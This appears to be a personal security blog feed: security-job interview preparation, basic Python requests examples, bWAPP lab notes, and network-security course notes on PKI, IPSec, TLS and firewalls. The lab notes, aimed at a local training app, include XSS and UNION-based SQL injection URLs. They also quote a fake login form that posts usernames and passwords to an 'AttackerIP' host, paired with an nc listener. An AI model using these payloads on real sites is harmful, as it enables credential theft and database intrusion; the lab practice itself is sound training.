<content type="html"><![CDATA[<blockquote><p>Spring recruitment ended a while ago; recording it here.</p></blockquote><h2 id="需要准备的几个方向"><a href="#需要准备的几个方向" class="headerlink" title="Areas to prepare"></a>Areas to prepare</h2><ol><li>Résumé </li><li>Self-introduction </li><li>Computer networks </li><li>Operating systems (OS principles, Linux, Windows) </li><li>Databases </li><li>Algorithms (LeetCode) </li><li>Programming languages (Python, C++, Go, etc.) </li><li><strong>Security knowledge</strong> (a lot of it, and very varied; study it selectively according to your strengths and the positions you apply for)</li></ol><p> For computer science fundamentals see CS-NOTES: <a href="http://www.cyc2018.xyz/">http://www.cyc2018.xyz/</a> </p><p> For security topics, search GitHub, Zhihu and similar platforms. <strong>Nowcoder</strong> also has a lot; look carefully. </p><p> Here are some <strong>security interview write-ups</strong> I collected myself: <a href="https://github.com/h4m5t/Sec-Interview">https://github.com/h4m5t/Sec-Interview</a> </p><p> Python interview questions: <a href="https://github.com/taizilongxu/interview_python">https://github.com/taizilongxu/interview_python</a> </p><h2 id="安全岗职位要求"><a href="#安全岗职位要求" class="headerlink" title="Security position requirements"></a>Security position requirements</h2><ul><li>Familiar with osquery and other open-source HIDS tools; have read part of the source or done secondary development on them </li><li>Hands-on experience (SRC programs, crowdsourced testing, HVV exercises, etc.) </li><li>Understand the principles of common high-risk vulnerabilities in middleware such as Redis/Docker/MySQL/Java frameworks </li><li>Proficient at writing PoCs, exploits, rules and fingerprints </li><li>Proficient with post-exploitation tools such as Cobalt Strike, Empire and Metasploit; </li><li>Intrusion detection </li><li>Familiar with one security sub-field, such as internal network penetration, mobile security, malware analysis or CTF competitions </li><li>Know the white-hat attack workflow and common white-hat tools; familiar with attack techniques; experience penetrating common servers </li><li>Familiar with popular attack tools; able to use various small tools flexibly and to develop related tools </li><li>Familiar with penetration workflows and attack techniques for web, internal networks and IoT; penetration testing or attack simulation experience </li><li>Project experience implementing complete SDL threat modelling </li><li>Project experience applying machine learning algorithms to real problems </li><li>Project experience implementing cloud security to solve real problems </li><li>Familiar with Windows and Linux systems and common commands; familiar with common web server configuration </li><li>Understand the principles of the OWASP Top 10; able to carry out and deliver penetration tests; familiar with penetration testing steps and methods </li><li>Understand common enterprise security defences; hands-on experience with defence bypass </li><li>Understand basic Linux, MySQL, Redis, Nginx, DDoS and related technologies </li><li>CTF competition winners preferred; high rankings on major SRC and crowdsourced testing platforms preferred </li><li>Cybersecurity law </li><li>Researchers who have independently found k8s, container escape or VM escape vulnerabilities preferred; </li><li>Familiar with white-box auditing; able to audit Python, Go and PHP code; </li><li>Kuaishou requirements </li><li>1. Proficient with common security testing tools such as SQLmap, Burp Suite and Metasploit; understand their principles, know their code and have done secondary development on them </li><li>2. Active in the security community; have submitted high-quality vulnerabilities or security analysis articles </li><li>3. Active in the developer community; have open-sourced security-related code </li><li>4. Internship experience on an internet company's security team </li><li>ByteDance requirements </li><li>Linux development ability </li><li>Shell </li><li>Windows/Linux client security offence and defence experience, or understanding of Android/iOS mobile security </li><li>Understanding of security compliance and security management </li><li>Data analysis, data mining, machine learning </li><li>React/Vue front-end </li><li>In-depth research in one or more of web security, server-side security, client security, mobile security, wireless security and IoT security</li></ul><h2 id="面试技巧"><a href="#面试技巧" class="headerlink" title="Interview tips"></a>Interview tips</h2><p> It is best to <strong>keep control of the interview's pace yourself</strong>. Nobody knows every area, and if you let the interviewer ask whatever they like, you will very probably fail. During your self-introduction, explain your learning path clearly so the interviewer knows what you can do and what you have worked with, giving them a rough sense of your areas. Second, your fundamentals must be solid: you should be thoroughly familiar with the principles, types, defences and applications of vulnerabilities, and it is best to prepare some deeper material that you do not mention at first and bring up only when asked; that works better. Next is project experience, which only counts if you really did it and understand it deeply; otherwise it easily leaves a bad impression on the interviewer. Finally, HR: in the technical interview you can chat, banter and joke with the interviewer, but better not with HR; be serious, do not blurt out every truth, and do not give them a reason to pass on you.</p><h2 id="我的春招记录"><a href="#我的春招记录" class="headerlink" title="My spring recruitment record"></a>My spring recruitment record</h2><p>To be continued</p>]]></content>
<categories>
<category> Interview </category>
</categories>
<tags>
<tag> Security </tag>
<tag> Interview </tag>
</tags>
</entry>
<entry>
<title>Python Security Development</title>
<link href="/2022/03/06/py%E5%AE%89%E5%85%A8/"/>
<url>/2022/03/06/py%E5%AE%89%E5%85%A8/</url>
<content type="html"><![CDATA[<blockquote><p>I have not touched programming for over half a year and am rusty. Building some small Python security tools for practice and review.</p></blockquote><h3 id="sqlmap-Tamper"><a href="#sqlmap-Tamper" class="headerlink" title="sqlmap Tamper"></a>sqlmap Tamper</h3><h3 id="Burp插件"><a href="#Burp插件" class="headerlink" title="Burp plugins"></a>Burp plugins</h3><h3 id="端口扫描探测"><a href="#端口扫描探测" class="headerlink" title="Port scanning and probing"></a>Port scanning and probing</h3><h3 id="python-web安全"><a href="#python-web安全" class="headerlink" title="Python web security"></a>Python web security</h3><p>1. Get the HTTP status code</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">import requests</span><br><span class="line">url = "https://baidu.com"</span><br><span class="line">r = requests.get(url)</span><br><span class="line">print(r.status_code)  # the numeric HTTP status, e.g. 200</span><br></pre></td></tr></table></figure><p>2. GET request</p><p>Without parameters</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">import requests</span><br><span class="line">url = "https://baidu.com"</span><br><span class="line">r = requests.get(url=url)</span><br><span class="line">print(r.url)</span><br><span class="line">print(r.headers)</span><br><span class="line">print(r.status_code)</span><br></pre></td></tr></table></figure><p>Request with parameters</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">requests.get(url, params={"key": "value"})  # params takes a dict of query parameters</span><br></pre></td></tr></table></figure><p>3. POST request</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">requests.post(url, data={"key": "value"})  # data takes a dict of form fields</span><br></pre></td></tr></table></figure><p>4. Custom request headers via <code>headers</code></p><p>5. Response headers and request headers</p><p><code>print(r.headers)</code></p><p><code>print(r.request.headers)</code></p>]]></content>
<categories>
<category> Security </category>
</categories>
</entry>
<entry>
<title>HTML5 New Security</title>
<link href="/2022/02/27/html/"/>
<url>/2022/02/27/html/</url>
<content type="html"><![CDATA[]]></content>
<categories>
<category> Security </category>
</categories>
</entry>
<entry>
<title>Shannon Information Theory</title>
<link href="/2022/02/26/xinxi/"/>
<url>/2022/02/26/xinxi/</url>
<content type="html"><![CDATA[]]></content>
<categories>
<category> Cryptography </category>
</categories>
</entry>
<entry>
<title>bWAPP Lab Notes</title>
<link href="/2022/02/18/bwapp/"/>
<url>/2022/02/18/bwapp/</url>
<content type="html"><![CDATA[<blockquote><p>Training notes for the bWAPP lab. I set it up a while ago but never got around to practising; now I have time.</p></blockquote><p>Main contents (a very comprehensive lab, nice!):</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections</span><br><span class="line">Blind SQL and Blind OS Command injection</span><br><span class="line">Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)</span><br><span class="line">Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)</span><br><span class="line">Cross-Site Request Forgery (CSRF)</span><br><span class="line">AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)</span><br><span class="line">Malicious, unrestricted file uploads and backdoor files</span><br><span class="line">Authentication, authorization and session management issues</span><br><span class="line">Arbitrary file access and directory traversals</span><br><span class="line">Local and remote file inclusions (LFI/RFI)</span><br><span class="line">Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,...</span><br><span class="line">HTTP parameter pollution and HTTP response splitting</span><br><span class="line">Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion</span><br><span class="line">Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations</span><br><span class="line">HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues</span><br><span class="line">Unvalidated redirects and forwards, and cookie poisoning</span><br><span class="line">Cookie poisoning and insecure cryptographic storage</span><br><span class="line">Server Side Request Forgery (SSRF)</span><br><span class="line">XML External Entity attacks (XXE)</span><br><span class="line">And much much much more…</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/02/20/D7wbMz1lakejums.png" alt="image-20220220202650607"></p><h2 id="A1-Injection"><a href="#A1-Injection" class="headerlink" title="A1 Injection"></a>A1 Injection</h2><p><strong>HTML Injection - Reflected (GET)</strong></p><p>GET-type HTML injection:</p><p><a href="http://127.0.0.1/bWAPP/bWAPP/htmli_get.php?firstname=%3Ch1%3Etest%3Ch1%3E&lastname=%3Ch1%3Etest%3Ch1%3E&form=submit">http://127.0.0.1/bWAPP/bWAPP/htmli_get.php?firstname=%3Ch1%3Etest%3Ch1%3E&lastname=%3Ch1%3Etest%3Ch1%3E&form=submit</a></p><p>XSS also works.</p><p><strong>HTML Injection - Reflected (POST)</strong></p><p>Just submit the POST request via HackBar.</p><p><img src="https://s2.loli.net/2022/02/20/2LMTuO1Etgp8J4I.png" alt="image-20220220204407419"></p><p><strong>HTML Injection - Reflected (URL)</strong></p><p>Try XSS:</p><p><a href="http://127.0.0.1/bWAPP/bWAPP/htmli_current_url.php?a=%3Cscript%3Ealert(/xss/)%3C/script%3E">http://127.0.0.1/bWAPP/bWAPP/htmli_current_url.php?a=%3Cscript%3Ealert(/xss/)%3C/script%3E</a></p><p>Capture the request with Burp and then modify the encoding:</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">GET /bWAPP/bWAPP/htmli_current_url.php/?a=&lt;script&gt;alert(/xss/)&lt;/script&gt; HTTP/1.1</span><br><span class="line">Host: 127.0.0.1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: PHPSESSID=r4h29vbhsl8upskjm0bs4ve575; security_level=0</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-Site: none</span><br><span class="line">Sec-Fetch-User: ?1</span><br></pre></td></tr></table></figure><p>That is the principle, but this only succeeds in Internet Explorer.</p><p><strong>HTML Injection - Stored (Blog)</strong></p><p>XSS is possible.</p><p>I looked at an exploit posted online by a foreign author:</p><figure class="highlight html"><table><tr><td class="code"><pre><span class="line">&lt;div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;"&gt;Please login with valid credentials:&lt;br&gt;&lt;form name="login" action="http://AttackerIP/login.htm"&gt;&lt;table&gt;&lt;tr&gt;&lt;td&gt;Username:&lt;/td&gt;&lt;td&gt;&lt;input type="text" name="username"/&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Password:&lt;/td&gt;&lt;td&gt;&lt;input type="text" name="password"/&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=2 align=center&gt;&lt;input type="submit" value="Login"/&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/form&gt;&lt;/div&gt;</span><br></pre></td></tr></table></figure><p>Attacker machine: nc -l 80</p><p><strong>iFrame Injection</strong></p><p><a href="http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250">http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250</a></p><p><strong>OS Command Injection</strong></p><p>Command injection, very similar to the DVWA one.</p><p><img src="https://s2.loli.net/2022/02/20/UKktMiq6WuCHn7R.png" alt="image-20220220212958793"></p><p><strong>OS Command Injection - Blind</strong></p><p>Similar to blind SQL injection: use timing to tell whether the command executed successfully.</p><p><strong>PHP Code Injection</strong></p><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">if(isset($_REQUEST["message"]))</span><br><span class="line">{</span><br><span class="line"></span><br><span class="line"> // If the security level is not MEDIUM or HIGH</span><br><span class="line"> if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")</span><br><span class="line"> {</span><br><span class="line"></span><br><span class="line">?&gt;</span><br><span class="line"> &lt;p&gt;&lt;i&gt;&lt;?php @eval ("echo " . $_REQUEST["message"] . ";");?&gt;&lt;/i&gt;&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br></pre></td></tr></table></figure><p><a href="http://127.0.0.1/bWAPP/bWAPP/phpi.php/?message=phpinfo()">http://127.0.0.1/bWAPP/bWAPP/phpi.php/?message=phpinfo()</a></p><p>A bit like injection through a GET parameter.</p><p><img src="https://s2.loli.net/2022/02/20/pXSNjQOwt8syzPq.png" alt="image-20220220213536683"></p><p><strong>Server-Side Includes (SSI) Injection</strong></p><p>Executing XSS here is no problem, but I am not yet familiar enough with server-side includes; I tried the foreign author's exploit and it did not succeed either.</p><p>Next come the SQL injection types.</p><p><strong>SQL Injection (GET/Search)</strong></p><img src="https://s2.loli.net/2022/02/20/u8NYSzxcdGIKl4H.png" alt="image-20220220214631158" style="zoom:67%;" /><p><a href="http://127.0.0.1/bWAPP/bWAPP/sqli_1.php?title=a%25%27%20order%20by%207%20--+&action=search">http://127.0.0.1/bWAPP/bWAPP/sqli_1.php?title=a%%27%20order%20by%207%20--+&action=search</a></p><p>Use ORDER BY to find the number of columns.</p><p>Database name and user name:</p><p><a href="http://127.0.0.1/bWAPP/bWAPP/sqli_1.php?title=a%27%20union%20select%201,database(),user(),4,5,6,7%20--+&action=search">http://127.0.0.1/bWAPP/bWAPP/sqli_1.php?title=a%27%20union%20select%201,database(),user(),4,5,6,7%20--+&action=search</a></p><p><strong>SQL Injection (AJAX/JSON/jQuery)</strong></p>]]></content>
<categories>
<category> Penetration Testing </category>
</categories>
</entry>
<entry>
<title>Attacks on the RSA Cryptosystem</title>
<link href="/2022/02/14/rsa/"/>
<url>/2022/02/14/rsa/</url>
<content type="html"><![CDATA[<blockquote><p>Reading notes on "Twenty Years of Attacks on the RSA Cryptosystem"</p></blockquote>]]></content>
<categories>
<category> Cryptography </category>
</categories>
</entry>
<entry>
<title>network-security Study Notes</title>
<link href="/2022/02/04/network/"/>
<url>/2022/02/04/network/</url>
<content type="html"><![CDATA[<h3 id="第一章:网络安全综述"><a href="#第一章:网络安全综述" class="headerlink" title="第一章:网络安全综述"></a>第一章:网络安全综述</h3><p>网络安全是建立在密码学以及协议设<br>计的基础上的</p><p>网络安全的主要任务:</p><ul><li>保障网络与系统 安全、可靠、高效、可控、持续地运行和被访问。</li><li>保障信息 机密、完整、不可否认、可认证地传输和使用。</li></ul><p>ISO-OSI模型。</p><p>TCP/IP模型</p><p><img src="https://s2.loli.net/2022/02/04/9dAn3ixbW4Q8vOh.png" alt="image-20210913194224992"></p><p><strong>X.800</strong></p><p>用一种或多种安全机制来实现安全服务,安全服务<br>致力于抵御安全攻击。</p><p>主动攻击:</p><ul><li>伪装</li><li>重放</li><li>篡改</li><li>拒绝服务</li></ul><p>被动攻击:</p><ul><li>窃听</li><li>流量分析</li></ul><p><img src="https://s2.loli.net/2022/02/04/3naZDNqwlg9tevy.png" alt="image-20210913194643371"></p><p><img src="https://s2.loli.net/2022/02/04/XHVR9Zpfa8zgFCj.png" alt="image-20210913194651098"></p><h3 id="第二章:公钥基础设施PKI"><a href="#第二章:公钥基础设施PKI" class="headerlink" title="第二章:公钥基础设施PKI"></a>第二章:公钥基础设施PKI</h3><p>1.公钥基础设施:PKI是一个用非对称密码算法原理和技术来实现并提供安全服务的具有通用性的<strong>安全基础设施</strong>。是一种遵循标准的利用公钥加密技术为电子商务的开展提供安全基础平台的<strong>技术和规范</strong>。能够为所有网络应用提供采用加密和数字签名等密码服务所需要的<strong>密钥和证书管理</strong>。</p><p>2.功能(为什么需要PKI)</p><p>对可信第三方的需要(CA)<br>电子政务、电子商务对信息传输的安全需求,统一标准<br>在收发双方建立信任关系,提供身份认证、数字签名、加密等安全服务<br>收发双方不需要事先共享密钥,通过公钥加密传输会话密钥</p><p>3.证书的基本结构</p><img src="https://s2.loli.net/2022/02/04/hNSCUm76I4MxOGL.png" alt="image-20210913200921714" style="zoom:50%;" /><p>4.组成</p><img src="https://s2.loli.net/2022/02/04/hNSCUm76I4MxOGL.png" alt="image-20210913201019930" style="zoom:50%;" /><p>5.密钥备份和恢复系统:</p><ul><li>签名密钥对:签名私钥相当于日常生活中的印章效力,为保证其唯一性、抗<br>否认性,<strong>签名私钥不作备份</strong>。签名密钥的生命期较长。</li><li>加密密钥对:加密密钥通常用于分发会话密钥,为防止密钥丢失时无法解密<br>数据,<strong>解密密钥应进行备份</strong>。这种密钥应频繁更换。</li></ul><p>6.交叉认证:</p><p>多个PKI独立地运行,相互之间应建立信任关系</p><p>对等CA互相签发</p><p>7.PKI服务</p><ul><li>认证</li><li>完整性</li><li>保密性</li><li>不可否认性服务</li><li>公证服务</li></ul><p>8.常用的密码技术</p><p><img src="https://s2.loli.net/2022/02/04/zK7PNpDgb36ZJiy.png" 
alt="image-20210913200849982"></p><p>机密性:数据加密(数字信封)</p><p>信息发送端用接收端的公钥,将一个通信密钥(即对称密钥)给予加密,生成一个数字信封。接收端用自己的私钥打开数字信封,获取该对称密钥SK,用它来解读收到的信息。</p><p>身份认证:数字签名</p><p>对待发的数据首先生成一段数据摘要,再采用己方私钥基于非对称加密算法进行加密,结果附在原文上一起发送,接受方对其进行验证,判断原文真伪。这种数字签名适用于对大文件的处理,对于那些小文件的数据签名,则不预先做数据摘要,而直接将原文进行非对称加密处理。</p><p><img src="https://s2.loli.net/2022/02/04/8ME9BfWIjDJYOec.png" alt="image-20210913203234717"></p><p>完整性:数字签名+MAC</p><p>不可否认性:数字签名+时间戳</p><p>由于非对称密码的运算复杂、加/解密速度慢,因此信息的加密采用对称密码<br>算法,其会话密钥的分发采用非对称密码算法,即采用收方的公钥对会话密<br>钥进行加密。</p><p>报文检验码(消息认证码MAC)</p><p>9.PKI功能操作</p><p><img src="https://s2.loli.net/2022/02/04/qRikpxLtbmevSK4.png" alt="image-20210913203710477"></p><p>初始化</p><ul><li>终端实体注册</li><li>密钥对产生(用户产生,CA产生,其他可信第三方产生)</li><li>证书创建</li><li>证书分发</li><li>密钥备份</li></ul><p>10.生命周期</p><ul><li>证书获取</li><li>证书验证——确定一个证书的有效性</li><li>密钥恢复——对终端用户因为某种原因而丢失的<strong>加密密钥</strong>可以恢复,从CA或信任第三方处恢复</li><li>密钥更新——当一个合法的密钥对将过期时,进行新的公/私钥的自动产生和相应证书的颁发</li></ul><img src="https://s2.loli.net/2022/02/04/jKIqVLdBDf9mErN.png" alt="image-20210913205553051" style="zoom:80%;" /><p>11.信任CA结构</p><ul><li>层次模型</li><li>分布式信任结构模型</li><li>桥式结构</li><li>混合结构</li></ul><p>层次模型:</p><p><img src="https://s2.loli.net/2022/02/04/bMj6Ot8GCWT1H4x.png" alt="image-20210913205835921"></p><p>分布式模型:</p><p><img src="https://s2.loli.net/2022/02/04/cbVHQY2hKjUoXiq.png" alt="image-20210913210007417"></p><p>12.证书链</p><p><img src="https://s2.loli.net/2022/02/04/yCGjYx7pRMuhIqd.png" alt="image-20210913205905995"></p><p><img src="https://s2.loli.net/2022/02/04/pvflzX9OgAWV6xQ.png" alt="image-20210913210043066"></p><p>13.X.509</p><p>为了解决X.500目录中的身份鉴别和访问控制问题而设计的。同时本身也采用目录的形式进行管理和访问。</p><p>14.主要内容</p><p><img src="https://s2.loli.net/2022/02/04/DLVSdZAvPF1WGuw.png" 
alt="image-20210913210603513"></p><p>15. CA</p><p>The certification authority (CA), the core entity of a PKI, issues electronic certificates to entities: it digitally signs an entity's identity information together with the corresponding public key, binding that public key to the identity so as to prove the authenticity of each entity's online identity; it is also responsible for verifying and managing certificates during transactions.</p><p>Functions</p><ul><li>Certificate application</li><li>Certificate approval</li><li>Certificate issuance</li><li>Certificate revocation</li><li>Certificate renewal</li><li>Certificate revocation list management</li><li>Certificate archiving</li><li>Maintenance and management of the CA itself</li><li>Management of the CA's own keys</li></ul><h3 id="第三章:IPSec-AH和ESP"><a href="#第三章:IPSec-AH和ESP" class="headerlink" title="第三章:IPSec-AH和ESP"></a>Chapter 3: IPSec AH and ESP</h3><p>1. IPv4 and IPv6</p><img src="https://s2.loli.net/2022/02/04/o1dMQ9qNkyS3hbL.png" alt="image-20210914224817924" style="zoom: 67%;" /><p>2. Security Association (SA)</p><p>So that both communicating parties agree on the authentication/encryption algorithms, their parameters and keys, they establish a relationship called a Security Association (SA)</p><p>An SA is unidirectional; bidirectional communication requires two SAs</p><p>Security Association Database (SAD)</p><p>Security Policy Database (SPD)</p><p>An SA is uniquely identified by a triple: the Security Parameters Index (SPI), a destination IP address used for outbound processing, and the protocol (AH or ESP)</p><p>3. Authentication Header (AH)</p><ul><li>AH provides connectionless integrity, data origin authentication and anti-replay protection</li><li>It does not provide confidentiality</li><li>AH authenticates IP packets with a message authentication code (MAC)</li></ul><p><img src="https://s2.loli.net/2022/02/04/BWHeyNro9dh3YxD.png" alt="image-20210915000523376"></p><p>Sequence number: prevents replay.</p><p>Authentication header: integrity check.</p><p>AH outbound and inbound processing</p><p>4. Encapsulating Security Payload (ESP)</p><ul><li>ESP provides data confidentiality, anti-replay service and (optionally) connectionless integrity</li><li>ESP mostly encrypts data with symmetric ciphers</li><li>ESP provides authentication with a message authentication code (MAC)</li></ul><p><img src="https://s2.loli.net/2022/02/04/dKOposuE4BMUtGT.png" alt="image-20210915001552673"></p><p>Purpose of padding:</p><ul><li>the encryption algorithm requires the plaintext to be a multiple of some number of bytes;</li><li>32-bit alignment;</li><li>hiding the real payload length, providing traffic-flow confidentiality</li></ul><p>ESP outbound and inbound processing.</p><p>5. Transport mode and tunnel mode</p><p><img src="https://s2.loli.net/2022/02/04/ykhDB23V76WCEoF.png" alt="image-20210915003245428"></p><p>6. IPsec and NAT</p><p>Advantages of IPsec:</p><ul><li>Security is enforced on all traffic crossing the boundary; the internal network need not bear the overhead;</li><li>Transparent to upper-layer protocols and end users;</li><li>Builds secure virtual private networks</li></ul><p>IP packets carrying an AH or ESP header cannot traverse NAT or NAT-PT</p><p>7. Application of IPSec tunnel mode: VPN</p><p>Types and functions of VPNs</p><p>8. IPsec implementation</p><p>IPSec VPN processing flow</p><h3 id="第四章:IPSec-IKE"><a href="#第四章:IPSec-IKE" class="headerlink" title="第四章:IPSec-IKE"></a>Chapter 4: IPSec IKE</h3><p>The Internet Key Exchange protocol is a protocol that <strong>dynamically negotiates IPsec SAs</strong> in a protected manner.</p><p>Function: mutual authentication using some <strong>long-term key</strong> and establishment of a <strong>session key</strong></p><p>Main mode, aggressive mode.</p><p> IKEv1, IKEv2</p><h3 
id="第五章:SSL-x2F-TLS基本协议"><a href="#第五章:SSL-x2F-TLS基本协议" class="headerlink" title="第五章:SSL/TLS基本协议"></a>Chapter 5: SSL/TLS Basic Protocols</h3><p>SSL (Secure Socket Layer) is a protocol that provides a secure channel between two end entities on top of TCP.</p><p>It protects transmitted data and identifies the communicating entities. The secure channel is transparent and independent of the application layer; the transport layer uses TCP, which provides a reliable service</p><p>SSL functions:</p><ul><li>The client authenticates the server</li><li>The server authenticates the client</li><li>A secure data channel is established between server and client</li></ul><p>How SSL works:</p><ul><li>The handshake protocol establishes the secure channel between client and server; it covers mutual authentication and the exchange of key parameters</li><li>The alert protocol signals security errors to the peer</li><li>The change cipher spec protocol announces a change of cipher parameters</li><li>The record protocol encapsulates the three protocols above and application-layer data</li></ul><h3 id="第六章:防火墙与NAT"><a href="#第六章:防火墙与NAT" class="headerlink" title="第六章:防火墙与NAT"></a>Chapter 6: Firewalls and NAT</h3><p>1. Definition: a firewall is a set of components placed between two (or more) networks that enforces access control between them</p><p>Firewall = hardware + software + control policy</p><p>Design goals:</p><ul><li>All network traffic between inside and outside must pass through the firewall;</li><li>Only traffic that conforms to the security policy may pass through the firewall;</li><li>The firewall itself must be resistant to attack;</li></ul><p>Why firewalls are necessary:</p><ul><li>Protect the inside from attacks originating on the Internet</li><li>Create security domains</li><li>Enforce the organization's security policy</li></ul><p>Firewall requirements (the two are in tension):</p><ul><li>Keep the internal network secure</li><li>Keep the internal network connected to the external network</li></ul><p>2. Classification</p><p>Packet-filtering firewalls</p><p>Attacks against packet-filtering firewalls</p><p>Stateful inspection firewalls (see Baidu Baike)</p><p>A stateful inspection firewall has an inspection engine at the network layer that intercepts packets, extracts information related to application-layer state, and uses it to decide whether to accept or reject the connection.</p><p>Application-level gateway firewalls</p><p>Proxy-service firewalls</p><p>Hybrid firewalls</p><p>Default security policies:</p><ul><li><p>Everything not forbidden is permitted</p></li><li><p>Everything not permitted is forbidden (recommended by RFC 2979)</p></li></ul><p>3. Functions</p><ul><li>Access control: isolation, filtering, proxying</li><li>Encryption</li><li>Authorization and authentication</li><li>Address translation (NAT)</li><li>VPN</li><li>Load balancing</li><li>Content security: virus scanning (signatures), URL scanning, HTTP filtering</li><li>Logging and accounting, auditing and alerting</li></ul><p>4. NAT: basic principle and purpose</p><p>Network Address Translation</p><p>NAT can be implemented on a (border) router or a firewall to translate between internal and external addresses</p><p>Types:</p><ul><li>Source NAT (SNAT), i.e. IP masquerading</li><li>Destination NAT (DNAT)</li></ul><p>Purposes:</p><p>SNAT</p><ul><li>Reuses global addresses for internal hosts, easing the shortage of IP addresses</li><li>Hides internal IP addresses from the external network</li></ul><p>DNAT</p><ul><li>Allows services to be reached in an environment that uses SNAT</li><li>Traffic balancing</li></ul><p>How NAT works:</p><p>How SNAT works</p><p>Implementation methods:</p><ul><li>Static NAT (one-to-one)</li><li>Dynamic NAT (many-to-many)</li><li>Overloading (one-to-many)</li></ul><h3 id="第七章:虚拟专用网VPN"><a href="#第七章:虚拟专用网VPN" class="headerlink" 
title="第七章:虚拟专用网VPN"></a>Chapter 7: Virtual Private Networks (VPN)</h3><p>Required technologies:</p><ul><li>Tunneling</li><li>Encryption and decryption</li><li>Key management</li><li>Authentication</li><li>Access control</li></ul><p>Classification:</p><img src="https://s2.loli.net/2022/02/04/V4UZSWYbT3NICLO.png" alt="image-20210916203559024" style="zoom: 50%;" /><p>IPSec VPN </p><ul><li>AH provides data origin authentication and integrity;</li><li>ESP provides data origin authentication, confidentiality and integrity;</li><li>IKE provides key negotiation</li></ul><h3 id="第八章:应用层安全协议"><a href="#第八章:应用层安全协议" class="headerlink" title="第八章:应用层安全协议"></a>Chapter 8: Application-Layer Security Protocols</h3><p>E-mail security protocols:</p><ul><li>PEM</li><li>S/MIME</li><li>PGP</li><li>SMTP</li></ul><p><img src="https://s2.loli.net/2022/02/04/vBzk5jb3mchOQW9.png" alt="image-20210916204440621"></p><p>Signing, compression, encryption</p><p>If a message exceeds the standard length, PGP automatically segments it and the receiver reassembles it.</p><p>Although PGP uses public key cryptography, it is not based on the PKI certificate system</p><p>S/MIME uses X.509 certificates; its key management scheme lies between the strict X.509 certificate hierarchy and the PGP web of trust</p><p>SSH</p><p>HTTPS (HTTP over SSL)</p><p>Secure Electronic Transaction (SET)</p><p>SET provides authentication among consumer, merchant and bank, and ensures the confidentiality of online transaction data, the integrity of the data, and the non-repudiation of transactions.</p><p>SET uses public key cryptography and follows the X.509 digital certificate standard</p><p>Dual signature</p><h3 id="第九章:无线局域网安全"><a href="#第九章:无线局域网安全" class="headerlink" title="第九章:无线局域网安全"></a>Chapter 9: Wireless LAN Security</h3><p>1. Classification of wireless networks</p><ul><li>Wireless wide area network (WWAN)</li><li>Wireless metropolitan area network (WMAN)</li><li>Wireless local area network (WLAN)</li><li>Wireless personal area network (WPAN)</li></ul><p>2. Ways to set up a WLAN</p><ul><li>Ad-hoc Mode</li><li>Infrastructure Mode</li></ul><p>3. WLAN security requirements</p><p>WLAN security mechanisms</p><ul><li>User authentication</li><li>User authorization</li><li>Data security</li></ul><p>802.11 security mechanisms</p><ul><li>Authentication</li><li>Data confidentiality</li><li>Data integrity</li></ul><p>WEP (Wired Equivalent Privacy)</p><p>Functions: access control, data confidentiality</p><p>802.11 security enhancements</p><img src="https://s2.loli.net/2022/02/04/TXoBc2NfMj16ls7.png" alt="image-20210917091147265" style="zoom:67%;" /><img src="https://s2.loli.net/2022/02/04/SWRCJfDHQzj5VEN.png" alt="image-20210917092310657" style="zoom:67%;" /><h3 id="其他"><a href="#其他" class="headerlink" title="其他"></a>Other</h3><p>Security mechanisms implement security services; security services counter security attacks.</p><img src="https://s2.loli.net/2022/02/04/XkBRKT8uEWjYpnN.png" alt="image-20211217161559825" style="zoom:67%;" 
/><p>Firewall design goals:</p><ul><li>All network traffic between inside and outside must pass through the firewall;</li><li>Only traffic that conforms to the security policy may pass through the firewall;</li><li>The firewall itself must be resistant to attack;</li></ul><p>Firewall control capabilities:</p><ul><li>Service control</li><li>Direction control</li><li>User control</li><li>Behavior control</li></ul><p>Packet-filtering firewalls inspect at the (network layer) and are implemented on (routers).</p><img src="https://s2.loli.net/2022/02/04/1i7PEv6InzcfU9h.png" alt="image-20211219145112895" style="zoom:67%;" /><p>Function of IKE: mutual authentication using some <strong>long-term key</strong> and establishment of a <strong>session key</strong></p><p>IKE is a protocol that <strong>dynamically negotiates IPsec SAs</strong> in a protected manner</p><img src="https://s2.loli.net/2022/02/04/7vSJnH9fz1mwtFy.png" alt="image-20211219154048173" style="zoom:67%;" /><img src="https://s2.loli.net/2022/02/04/F1E85HSVDLQMobq.png" 